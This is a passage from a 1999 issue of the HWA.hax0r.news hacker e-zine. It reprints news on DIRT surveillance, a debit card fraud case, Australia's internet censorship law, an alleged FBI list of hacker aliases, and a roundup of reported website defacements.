To use DIRT law enforcement agencies must first obtain a wiretap search warrant. But privacy groups maintain that this type of electronic surveillance goes far beyond wiretap warrants because DIRT allows authorities to invisibly snoop inside a targeted PC's entire hard drive --not just monitor electronic communications.

"Throughout history law enforcement has had a long track record of overstepping its bounds when it comes to search warrants," says Shari Steele, director of legal services for Electronic Freedom Foundation, the privacy rights group.

Unless appropriate checks and balances are in place, Steele says, DIRT can quickly go from being an effective crime-fighting tool to a privacy activist's worst nightmare.

The American Civil Liberties Union takes a harder stance. "Clandestine searches like these are the worst kind," says Barry Steinhardt, associate director of the ACLU. "This is exactly the kind of search the Fourth Amendment is designed to protect us from."

@HWA

32.0 Debit Cards Not Safe on the Internet
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 30th

From HNN http://www.hackernews.com/

contributed by mortel

Illustrating the problem of debit card use on the Internet Don Garlock, a consultant for the Bedford County Sheriff's Department in Bedford, VA describes his search for the people who wiped out his bank account.
MSNBC
http://www.msnbc.com/news/283239.asp

The dark side of online shopping

Trail of fraud leads from Amazon.com to Thailand

By Molly Masland
MSNBC
June 24

When Internet investigator Don Garlock’s bank account was mysteriously cleaned out in early June, the last thing he expected was that the search for the culprit would take him on a shadowy trail through cyberspace. The clues began at online retail giant Amazon.com and led to a ring of alleged hackers in Bangkok, Thailand. Along the way, Garlock picked up crucial lessons about the perils of online shopping, even at sites that claim to be "100 percent safe."

A CONSULTANT for the Bedford County Sheriff’s Department in Bedford, Va., Garlock works for Operation Blue Ridge Thunder, a program aimed at stopping crimes against children on the Internet. Garlock has logged hundreds of hours hunting down pedophiles and child pornographers online. So when his personal bank account was suddenly emptied in early June, Garlock put his online tracking skills to the test. But even he was surprised by what he discovered.

FRAUDULENT CHARGES AT AMAZON

According to Mainstreet Bank Group, Garlock’s bank, someone had purchased nearly $1,400 worth of merchandise at Amazon.com and charged it to his debit card account.

When the mysterious charges at Amazon.com appeared, Garlock immediately suspected fraud and called the online retailer of books and music to find out who was responsible.

But Garlock was astonished to find that Amazon.com would not release any information to him about his account. A customer of several years, Garlock had placed modest orders in the past, spending a total of $160, and had never had an unpleasant shopping experience at the online retailer’s site. But Amazon.com would neither release the name of the individual who had purchased the goods using his debit card number nor tell Garlock what specific merchandise had been bought or where it had been shipped.
Amazon.com spokesman Paul Capelli said the company makes it a policy to release detailed information about an account only to a customer’s bank, which can then release the details to their client.

“We want to take reasonable steps to protect our customers’ privacy,” said Capelli. “We need to know we’re dealing with the real customer, not someone calling on the phone who could be anyone.”

As a result, the only information Garlock received directly was a hint accidentally leaked over the phone by a customer service representative.

“They let slip the first half of the e-mail address, and then they realized what they had done and put me on hold. They came back and read me a prepared response to the effect that they could not divulge any additional information to me,” said Garlock.

TRAIL TO THAILAND

Frustrated, Garlock was determined to proceed with his own investigation. While his bank began an official inquiry into the case with Amazon.com, Garlock went to work. Using the limited information he had obtained from Amazon.com, he uncovered a path of clues leading to a ring of alleged computer hackers in Bangkok, Thailand.

The first part of the e-mail address given to him contained “an unusual word and turned out to be what is a very common first name in that part of the world,” he said.

Garlock was able to uncover a wealth of personal information about the individuals who had used his card. With the help of ordinary search engines, he uncovered their home addresses, phone numbers and where they attended college. Garlock also found that in addition to having multiple e-mail addresses and Web sites touting their hacking skills, the alleged thieves held legitimate Web development jobs.

“We know a tremendous amount of personal, professional and business-type information on these people now from our investigations here in little old Bedford County,” said Sheriff Michael Brown.
Eventually Amazon.com released the shipping address and fraudulent e-mail address used by the credit card thieves to Garlock’s bank, but by then the information only confirmed the data he had already uncovered.

Because the sheriff’s office has no jurisdiction in Thailand, the department turned the case over to Interpol, the international crime investigation agency that works with federal law enforcement agencies and national police forces. Garlock’s case is under review and, according to Brown, will most likely be turned over to the FBI, U.S. Customs or the Secret Service.

MORE CASES OF FRAUD

‘From the time there has been credit cards, there has been credit card fraud. Bad things can happen any place and the Internet is no different.’
PAUL CAPELLI
Amazon.com spokesman

In an e-mail sent to Garlock, Amazon.com’s investigations department confirmed that the charges made to his debit card were indeed “the result of unauthorized use.” Mainstreet Bank Group said an investigations officer at Amazon.com admitted that the same group in Thailand had set up a number of other stolen credit card numbers for use at the retailer’s site.

In a memo obtained by MSNBC, Shirley Schoefield, a bank investigations officer at Mainstreet Bank Group, said that “according to the investigations department at Amazon, approximately 20 cards have been set up for use to purchase merchandise to be sent to the following shipping address (in Thailand).” Citing customer privacy restrictions, Schoefield refused to comment on the case.

Amazon.com’s Capelli also refused to comment on the case of the 20 fraudulent credit cards, but acknowledged that there have been instances of credit card misuse at the site.

“From the time there has been credit cards, there has been credit card fraud. Bad things can happen any place, and the Internet is no different. Any retailer encounters this problem,” he said. However, he insisted that Amazon.com’s security system had never been compromised.
Currently Amazon.com is advertising for positions in its fraud investigation department. Under the section “employment opportunities” on its Web site, Amazon.com is looking for a “fraud detection specialist” as well as a “fraud detection manager.”

‘DON’T USE A DEBIT CARD’

Garlock’s situation was made worse by the fact that his debit card number was stolen instead of a credit card. If his credit card had been used fraudulently, according to federal regulations, he could have easily stopped payment on the account and would have been held responsible for no more than $50.

But since his debit card was stolen, he temporarily lost everything in his checking account. When a debit card is used, the money is automatically removed from the account when the order is processed. While the bank is still responsible for paying Garlock back, he must wait until the official investigation is complete, a process that can take weeks and sometimes months.

“One of the biggest lessons I’ve learned from this is, for God’s sake, don’t use a debit card on the Internet,” said Garlock.

Amazon.com has a policy of fully refunding unauthorized charges billed to a customer’s account and has agreed to pay back Garlock any amount billed to his account that is not covered by his bank.

HACKER AND/OR THIEF?

While it is clear that Garlock’s debit card number was stolen and used illegally, what remains unknown is whether the thieves first obtained the number by breaking into Amazon.com’s site, or whether the numbers were obtained from another source or even generated randomly.

Amazon.com’s Capelli said that hackers have never broken into the company’s site or stolen information on individual accounts.

“Our system of storing credit card information has not been compromised, nor has it ever been compromised in any way. Any claims to this effect are not true — absolutely not true,” said Capelli.
According to Inspector Earl Wismer of the San Francisco Police Department, which handles many cases of Internet fraud, “It’s really difficult to pin down where exactly a credit card number was acquired. It is common for credit card numbers to be fraudulently used on the Web, but we’re not able to determine whether the numbers were obtained from the Web or from some other source.”

In addition to stealing credit card numbers the old-fashioned way, such as acquiring the number from receipts, there are several sites on the Web where hackers, or anyone else who’s interested, can generate legitimate credit card numbers based on algorithms, or mathematical formulas, used by banks. The algorithms generate all the numbers used by a given bank, but the hacker must then systematically try out each number in an effort to find one that is in current use and still has an available credit limit.

CROSS CHECKS NEEDED

Garlock’s case is worrisome because no matter how his debit card number was acquired, the user was still able to charge a hefty amount of merchandise to a debit card account owned by a person living in the Blue Ridge Mountains of Virginia and have it shipped to an address in Bangkok without any alarm bells going off at Amazon.com.

“Apparently their order confirmation system that would match a card number to a given individual is seriously flawed,” said Garlock.

According to Capelli, the person who fraudulently used Garlock’s debit card set up a separate account using the card number, but did not break into Garlock’s existing account.

Capelli dismissed the need for a more thorough cross check of credit card numbers with existing account information adding that “it is very common to have more than one account per card number. For instance, there are husbands and wives with different names who have different accounts but use the same card number.
Or parents who let their children use their credit card number to set up an account.”

As Scambusters, an online consumer advocacy organization, points out, the reality is that it’s actually much safer to enter a credit card number on a secure online order form than it is to give a credit card to a waiter at a restaurant. But there are important security measures to be worked out before the process is 100 percent safe, despite what many online sites want customers to believe.

“There is definitely a problem and I think some people in the industry have known that it is a problem. It is not one that’s going to be fixed easily,” said Sheriff Brown. “Consumers have just got to be careful.”

@HWA

33.0 New Definition of 'Computer Hacker'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 30th

From HNN http://www.hackernews.com/

contributed by mortel

A woman in Grafton Ohio has redefined the term 'computer hacker'. Twenty nine year old Kelli Michetti, upset that her husband was spending too much time online took a meat cleaver and attacked the home computer. She was fined $200 for her actions.

CBS News
http://www.cbs.com/flat/story_164947.html

@HWA

34.0 Hackers In the Workplace
~~~~~~~~~~~~~~~~~~~~~~~~

July 1st

From HNN http://www.hackernews.com/

contributed by Whoever

Security companies claim that they do not hire hackers. In reality are they actually actively recruiting hackers? Are they doing this because they know that not only are they the most knowledgeable but also the most loyal and hard working? A new HNN exclusive Buffer Overflow article examines these questions and more.

Buffer Overflow
http://www.hackernews.com/orig/buffero.html

@HWA

35.0 NPR Covers .gov/.mil Defacements.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

July 2nd

From HNN http://www.hackernews.com/

contributed by oolong

In a rare moment of media impartiality, NPR's Morning Edition yesterday broadcast an article about the latest .gov breaking that featured an interview with Attrition staff.
This interview properly puts the blame of the hacked pages on poor web server maintenance. This article is in Real Audio format. Kudos to Morning Edition for being fairly impartial, hopefully it will not be too much to ask other outlets to follow their example.

NPR - print
http://www.npr.org/news/tech

NPR - Real Audio
http://www.npr.org/ramfiles/me/19990630.me.03.ram

"
Hackers Strike Again

Over the past month, there has been a rash of computer hacker attacks on government web sites including the White House, the FBI, and the Senate. Earlier this week they hit the Army's site and Wednesday the National Oceanic and Atmospheric Administration's Storm Prediction Center Web site was disabled. In some cases, the hackers were able to exploit computer systems that have not kept up to date with Internet security alerts. Hear more as NPR's John McChesney reports for Morning Edition.
"

36.0 Australia Passes Major Net Censorship Law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

July 2nd

From HNN http://www.hackernews.com/

contributed by photon

Australian Parliament has created one of the world's most far-reaching online censorship laws. The Broadcasting Services Amendment Act will institute a rating system for Internet content. The Australian Broadcasting Authority will order ISPs to take down content on their servers rated X (Sexually Explicit) or RC (Refused Classification) within 24 hours of being notified. Opponents who failed to prevent the bills passing hope that the decentralized nature of the internet will prove to be uncontrollable by this new law. One loophole in the law is already being exploited, regulators forgot to include anonymous proxy services in the legislation.
Wired
http://www.wired.com/news/news/politics/story/20499.html

MSNBC
http://www.msnbc.com/news/285849.asp

Broadcasting Services Amendment Act
http://www.ozemail.com/~mbaker/amended.html

Australian Broadcasting Authority
http://www.aba.gov.au/

Wired;

Australian Net Censor Law Passes
by Stewart Taggart

8:15 a.m. 30.Jun.99.PDT
CANBERRA, Australia -- The political leaders of this nation on Wednesday passed into law one of the world's most far-reaching online content censorship regimes.

The rules -- which take effect 1 January, 2000 -- enable Australian government regulators to order domestic Internet service providers (ISPs) to take down indecent or offensive Web sites housed on their servers, and also require they block access to certain domestic or overseas-based content.

"We're on fairly new ground here," said Stephen Nugent, special projects manager for the Australian Broadcasting Authority (ABA). "The codes of practice envisaged under this legislation are probably more detailed, and cover a greater range of matters, than I have seen in any other country."

Known as the "Broadcasting Services Amendment (Online Services) Act", the measure was approved by the House of Representatives late Wednesday night, according to a staffer in the office of Communications Minister Richard Alston. The measure had passed the more contentious Australian Senate on 26 May.

The new law will institute a movie-like rating system for Internet content. The ABA will order ISPs to take down content on their servers rated X (Sexually Explicit) or RC (Refused Classification) within 24 hours of being notified.

For opponents of online content restrictions, the struggle will now shift to cyberspace itself. They believe the Internet simply will prove too large, too decentralized, and too fast-moving for regulators anywhere to successfully block access to any content for long.

Among the defiant is Perth-based online entrepreneur Bernadette Taylor.
Known to her Web site admirers as a "Virtual Girlfriend," she offers nude photos of herself and personalized email communication to paying members.

To Taylor, passage of the law merely begins a hide-and-seek game she professes little doubt she'll win. With a Web site housed in Dallas, Texas, she plans to stay one step ahead of the nation's blocking mechanisms for as long as the law lasts.

"With a bit of effort the ABA could find (and block) me every day but they'd have to spend five to 10 minutes doing it," she says. "In the meantime, I'm compiling a mail list which has all the people that want notification of where I am."

She believes her Australian-based users will encounter little ongoing difficulty accessing her site, either through using encryption software or through proxy servers that disguise the source of material.

One such proxy server has been set up by South Australian Web site builder and e-commerce businessman Mike Russell. By visiting www.whois.com.au, Australian Web users will be able to access any site they want without disclosing where they're visiting.

Since banning proxy servers isn't included in the legislation, Russell says there will be little Australian regulators can do.

Among other defiant gestures, Russell is calling for a worldwide boycott by Web sites of visitors from "gov.au" domains -- recommending all such visitors be redirected by webmasters to the home page of Electronic Frontiers Australia, the online civil liberties group that spearheaded a failed effort to stop the law.

In introducing the online content legislation, the center-right government of Prime Minister John Howard argued that some controls are needed to limit access by children to pornographic content on the Internet, as well as other material that could be deemed offensive.

Passage of the law comes amid research showing Internet use is rising rapidly in Australia.
Figures released Wednesday by the Australian Bureau of Statistics showed nearly 18 percent of Australia's households now have some form of Internet access -- a rise of nearly 50 percent in one year. Nearly 40 percent of Internet households in Australia now access the Internet on a daily basis, the researchers found.

To Grant Bayley, a Sydney spokesman for 2600 Australia, an organization of technology enthusiasts, the fact that the law comes into force on 1 January, 2000 provides at least one indication that Australian lawmakers may not have been fully cognizant on all the issues involved.

"January 1 is not going to be one of the best days in the world to implement this," he said, referring to the long-feared Year 2000 problem in which worldwide computers may start acting up due to the millennial date change.

"There are going to be much bigger problems around," he said.

@HWA

37.0 Hacker Crackdown, is your nick on this list??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From www.rewted.org

Fbi releases hacker list -- saturday june 27 -- 11:00 sct

The FBI has started an all-out war on hackers and the like, they have received monetary funds from the government and are monitoring many servers, there is a possibility they are monitoring a few EFnet servers, but other than that agents go online posed as regular people. They also are monitoring DALnet and are considering going on UnderNet next. Watch your backs. With the funding, the FBI has invested in much equipment and software for many things, but the main thing it goes toward is _REWARDS_. If you provide the FBI with information leading to the prosecution of a hacker you are rewarded $5,000-10,000, and they are targeting many young people in groups. Their tactic with young people is to scare them with lines such as: "Are you gonna cough up the info on your buddy or be the first 13-year-old in federal prison?" So groups, watch your little ones.
check the list out below

IRC Server: teen.vdi.net Channel #crackdown
----------------------------------------------------------------------------

AntiOnline Receives Directives
Thursday, May 27, 1999 at 11:59:27
by John Vranesevich - Founder of AntiOnline

AntiOnline has received directives given to several ISPs listing the groups of hackers and hackgroups that they're currently targeting. Sources faxed AntiOnline the 6 page directive which begins:

You are hereby requested to preserve, under provisions of Title 18, United States Code, Section 2703(a)(unopened e-mail), (b)(content),(c)(logs and records), and (f)the following records in your custody and control, including records stored on backup media:

The request then goes on for 6 pages listing hacker, groups, and media currently under investigation by the FBI. The list contains not only the hacker's handles, but in most cases, their real names. For the privacy of those involved, AntiOnline is only publishing their aliases.
Here is a partial list of the individuals on that list:

Sate mz_chick epoh Anacarda kimmie badfrog Becky iCBM rox Code0 Codex Sygma
Cyberfire DigitalX Ibanez Spaceg0at Downfall Duk0r elf solarix VectorX f00t
f0nz ganja Vie IO Cl0pz Bladex vallah jenna coolio hamster prym tr0n lure LD
shortee LongDistance lothos blackhappy darkfaery crazygyrl Diesl0w blanc 09
Acidkill Phear nonlinea optic Overdose P0rt MostHated fryz hyrid ghost Rizzy
prophet shdwknght sidney status taylor Texan Borgie d0lz timebomb Blakforge
Type-0 watchy wolf303 wookie Yorph random totempole cyberf|re jos Mcintyre
Eckis Twisted-- Pantera angelo espionage fenderkev ne0h digital- ID-50 taylor
cult_hero socked problem mal_vu minos series ben-z rslink- judy

The directive goes on to request information to:

Directories, files, logs, records, information or any data concerning IRC Channels visited by Hackers or individuals listed in paragraph 1, specifically:

It goes on to list the following IRC Channels:

#creep #j00nix #tk #pascal #ex0dus #faggotsex #gayfagsex #gaysex #hackunix #hax0r #lezbiandsex #linux #sex_gay #sex_pl #shellx.log

Section 5 of the directive requests:

Directories, files, programs, logs, or data concerning the Names of hacker groups:

This section goes on to list:

GlobalHell gH milw0rm Total-ka0s tk Darkcyde D4rkcyde 2600 world domination enforcers enphorcers hackphreak

Section 7 requests:

Victim names or known victim identifying numbers, such as names, addresses, and telephone numbers, concerning the Individuals listed in paragraph 1, or listed below:

Section 7 goes on to list:

Meeting Place At&T Latitude Sprint MCI GTE Alltell Steve Huron Josh Teplow 1-800- 1-888- DCCCD LCET Walburg Dillon Reed 3-com 3com arizona.edu umich.edu uchicago.edu udel.edu uga.edu uwashington.edu

As ALWAYS, AntiOnline will bring you the latest information as it becomes available.
IRC Server: teen.vdi.net Channel #crackdown
----------------------------------------------------------------------------

FBI lurking on IRC
May, 30 1999 - 22:07
contributed by: BinaryZer0

From an unidentified source, I, and others, have been told to keep quiet on IRC's EFnet, especially the lagged.org servers. Why? It is possible that the FBI received cooperation from lagged.org officials, and the FBI is now sniffing the server. It is possible that they are sniffing out words like "hack" with a similar type of contraction as "grep". This is due to the recent hacks of government sites, and the involvement of gH members (who hang out on EFnet). Further details will, somehow, be investigated.

IRC Server: teen.vdi.net Channel #crackdown
----------------------------------------------------------------------------

As I have been told, a few people were raided a few weeks back:

Becky- fryz MostHated

Nothing really has been pinned on them. More can be discussed on the IRC server, teen.vdi.net, port 6667 in channel #crackdown.

-missnglnk

@HWA

-=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-
                     T H E   R U M O U R   M I L L
-=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-

Rumours:
~~~~~~~

Send rumours to hwa@press.usmc.net, or join our irc channel and gossip!! tnx ..

+ www.403-security.org has had a facelift, check out the new look and leave your comments to astral on how you like it...

+ Help! net-security is changing servers and may be down for a few days while they overcome some new server teething problems (probably dns related). see elsewhere this issue for more details ...

+ HNN: contributed by Space Rogue, HNN hopes everyone has a fun filled Fourth of July weekend. Note, that there will be no news update on Monday. Be sure to check in next week as we attempt to update the site remotely from Defcon7 in Las Vegas.
We should be ready to announce the HNN T-shirts that everyone has been asking for on Tuesday. Oh, and SETI@Home released version 1.5 of the SETI software last Wednesday which fixes quite a few bugs. (with all the news lately we forgot to mention it). Be sure to join up with the HNN team as you search for that Aranakin guy.

HNN Team for SETI@Home
http://setiathome.ssl.berkeley.edu/cgi-bin/cgi?cmd=team_lookup&name=The+Hacker+News+Network

AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ATTRITION.ORG http://www.attrition.org
ATTRITION.ORG Advisory Archive, Hacked Page Mirror
ATTRITION.ORG DoS Database, Crypto Archive
ATTRITION.ORG Sarcasm, Rudeness, and More.

www.2600.com www.freekevin.com www.kevinmitnick.com
Support 2600.com and the Free Kevin defense fund site, visit it now! FREE KEVIN!
One of our sponsors, visit them now www.csoft.net

WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV
JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD

WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM

To place an ad in this section simply type it up and email it to hwa@press.usmc.net, put AD! in the subject header please. - Ed

@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~

Don't worry. worry a *lot*

Send in submissions for this section please! .............

From www.innerpulse.com ...

JP offers a public personal insight to his family
Contributed by mkatona
Tuesday - March 02, 1999. 05:09PM UTC

In an off the wall media report, AntiOnline's owner, JP, reveals personal information to the world: "It's no secret my Father was a famous actor. And instead of letting the rumor mill swallow this down, I would rather tell it like it is.. Yes my father was Beaver Cleaver." Immediately after, JP played a Leave it To Beaver midi theme, put on a small baseball hat and walked out.
When reached by phone JP has this to say, "Yes, AntiOnline is a hackers security site. But so what if my dad was Beaver Cleaver. I still have to stop hackers. And please cease with the Little Beaver emails. It's annoying and pointless. One of the reasons AntiOnline is so successful is because my dad told me to get revenge on the world for canceling his show. And that Beaver Cleaver dis-placed anger still lingers in me. So you can do anything you want to.. But remember, I have Beaver power!"

It's not sure if Wally and the rest of the whole gang are open to questions. Last seen, Ward Cleaver was still on AOL perfecting his scrolling skills. The FBI has also opened a case against suspected Granny Hacker from heck Carolyn Meinel on the grounds of dressing/looking like a crack friend and the possibility she is Wally's long lost best friend, Eddy Haskel.

[Reporting for innerpulse.com, Innerpulse News, this is Matthew Katona from polyester.net signing off.]

AntiOnline
http://www.antionline.com/

@HWA

SITE.1 AntiOffline
~~~~~~~~~~~

http://www.antioffline.com/ is a parody of AntiOnline which has been around for some time now, check it out if you haven't already.

http://www.antioffline.com/

@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'...

From HNN rumours section http://www.hackernews.com/
see the archives section on HNN or attrition.org for copies of many of these sites in their defaced form.

http://www.attrition.org/

June 28th

contributed by Anonymous
Cracked
A busy weekend for some. Take a look at all the .gov sites.

        June 29th
        Contributed by Anonymous

        Cracked
        The following sites have been reported as cracked.

        June 30th
        contributed by Anonymous

        Cracked
        The following sites have been reported as compromised.

        July 1st

        Keebler Elves Strike Yet Another Government Server
        contributed by Code Kid

        Upset by the actions of John Vranesevich of AntiOnline and Harvard
        University's overreaction the Keebler Elves have attacked another
        government web site. This time they have posted very derogatory
        comments about John Vranesevich on the web site of the Bureau of
        Reclamation, Rio Grande Operations.

        HNN Cracked Pages Archive
        http://www.hackernews.com/archive/crackarch.html

        July 2nd
        contributed by Anonymous

        Cracked
        The following sites have been reported as compromised over the last
        two days.

        http://www.maris.int - possible first crack of .int domain

 -------------------------------------------------------------------------

 A.0                        APPENDICES
 _________________________________________________________________________

 A.1    PHACVW, sekurity, security, cyberwar links
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

        The links are no longer maintained in this file, there is now a
        links section on the http://welcome.to/HWA.hax0r.news/ url so check
        there for current links etc.

        The hack FAQ (The #hack/alt.2600 faq)
        http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

        Hacker's Jargon File (The quote file)
        http://www.lysator.liu.se/hackdict/split2/main_index.html

        New Hacker's Jargon File.
        http://www.tuxedo.org/~esr/jargon/

        HWA.hax0r.news Mirror Sites:
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~
        http://www.csoft.net/~hwa/
        http://www.digitalgeeks.com/hwa.
        http://members.tripod.com/~hwa_2k
        http://welcome.to/HWA.hax0r.news/
        http://www.attrition.org/~modify/texts/zines/HWA/
        http://packetstorm.genocide2600.com/hwahaxornews/
        http://archives.projectgamma.com/zines/hwa/.
        http://www.403-security.org/Htmls/hwa.hax0r.news.htm

        International links:(TBC)
        ~~~~~~~~~~~~~~~~~~~~~~~~~

        Foreign correspondents and others please send in news site links
        that have security news from foreign countries for inclusion in this
        list thanks... - Ed

        Belgium.......: http://bewoner.dma.be/cum/
        Brasil........: http://www.psynet.net/ka0z
                        http://www.elementais.cjb.net
        Canada .......: http://www.hackcanada.com
        Colombia......: http://www.cascabel.8m.com
                        http://www.intrusos.cjb.net
        Indonesia.....: http://www.k-elektronik.org/index2.html
                        http://members.xoom.com/neblonica/
                        http://hackerlink.or.id/
        Netherlands...: http://security.pine.nl/
        Russia........: http://www.tsu.ru/~eugene/
        Singapore.....: http://www.icepoint.com
        Turkey........: http://www.trscene.org - Turkish Scene is Turkey's
                        first and best security related e-zine.

        Got a link for this section? email it to hwa@press.usmc.net and i'll
        review it and post it here if it merits it.

 @HWA

 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

     © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }

 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
 [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
 [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]